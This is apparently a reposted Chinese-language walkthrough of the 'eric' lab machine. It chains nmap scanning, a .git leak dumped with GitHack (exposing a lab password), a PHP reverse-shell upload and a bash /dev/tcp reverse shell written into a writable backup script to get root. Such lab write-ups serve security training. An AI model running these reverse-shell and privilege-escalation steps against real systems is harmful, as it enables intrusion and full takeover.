欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 教育 > 幼教 > SP: eric

SP: eric

2025/1/20 8:20:03 来源:https://blog.csdn.net/Aukum/article/details/141603242  浏览:    关键词:SP: eric

靶机搭建

靶机下载地址

在Virtualbox中打开下载好的靶机,网络配置修改为桥接模式,启动靶机即可。

信息收集

主机发现

nmap 192.168.31.0/24 -Pn -T4

靶机IP:192.168.31.244

端口扫描

nmap 192.168.31.244 -A -p- -T4

根据端口扫描结果可知开放了22,80端口,并且80端口的http服务直接暴露了/.git/(Git是一个被用于协同开发和代码刮玻璃的开源分布式和版本控制系统),可以考虑git信息泄露。

web站点信息收集

访问80端口。

直接访问/.git提示forbidden。目录扫描看看有没有其他信息。

dirsearch -u http://192.168.31.244

看到/.git下还有很多目录文件,一些能访问,大概率就是git信息泄露。根据文件内容猜测用户名是admin。 

访问/admin.php,一个登录页面。用户名admin,密码尝试sql万能密码失败并提示不需要暴力破解。

渗透

git信息泄露漏洞

git泄露漏洞产生原因:由于开发人员用git进行版本控制,对站点自动部署,如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。

使用githack下载Git存储库获取包含未加密密码。

python2 GitHack.py http://192.168.31.244/.git

到提示的文件夹看Git数据库。在admin.php中发现用户名和密码,admin:st@mpch0rdt.ightiRu$glo0mappL3

访问admin.php成功登录后是文件上传功能点。

利用文件上传getshell

上传反弹shell,用kali自带的php-reverse-shell.php(/usr/share/webshells/php),记得要修改ip和port。

前面目录扫描得到一个路径/upload,猜测文件上传的保存路径是/upload。nc开启监听,访问/upload/php-reverse-shell.php。

# 获得交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

get flag.txt!

提权

eric家目录下不仅有flag.txt,还有backup.sh,可读可写可执行。

在backup.sh中写入反弹shell即可拿到root权限。

# 向backup.sh写入反弹shell
echo 'bash -i >& /dev/tcp/攻击机ip/5555 0>&1' > backup.sh
# 运行backup.sh
./backup.sh
# 攻击机监听端口
nc -lvp 5555

拿到root shell。

get flag.txt!🎆

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com